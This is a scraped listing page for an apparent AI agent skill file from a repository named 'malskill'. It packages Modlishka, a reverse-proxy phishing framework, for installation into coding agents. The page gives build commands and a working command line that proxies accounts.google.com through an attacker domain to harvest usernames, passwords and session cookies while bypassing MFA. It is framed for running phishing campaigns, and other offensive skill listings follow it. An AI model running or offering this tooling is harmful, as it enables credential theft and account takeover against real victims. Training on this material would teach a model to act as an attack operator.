offensive-tools/social-engineering/modlishka/SKILL.md
Modlishka: flexible reverse proxy phishing framework that captures credentials and session cookies while bypassing 2FA/MFA. Use when conducting phishing campaigns targeting OTP or push MFA by acting as a transparent MITM between victim and the real site.
npx skillsauth add aeondave/malskill modlishkaInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Reverse-proxy phishing that bypasses 2FA/MFA.
git clone https://github.com/drk1wi/Modlishka && cd Modlishka && make
./Modlishka -target https://accounts.google.com \
-phishing phish.attacker.com \
-cert cert.pem -key key.pem \
-credParams username=,password=
./Modlishka -config config.json
| Flag | Purpose |
|------|---------|
| -target | Real site to proxy |
| -phishing | Attacker phishing domain |
| -cert / -key | TLS certificate paths |
| -credParams | Field names to harvest |
| -trackingCookie | Victim tracking cookie name |
| -jsRules | JavaScript inject rules |
| -config | JSON config file path |
config.json with target, domain, TLS pathshttp://127.0.0.1:8888 shows captured credentials + session cookies| File | When to load |
|------|--------------|
| references/ | Config template, operator panel usage |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.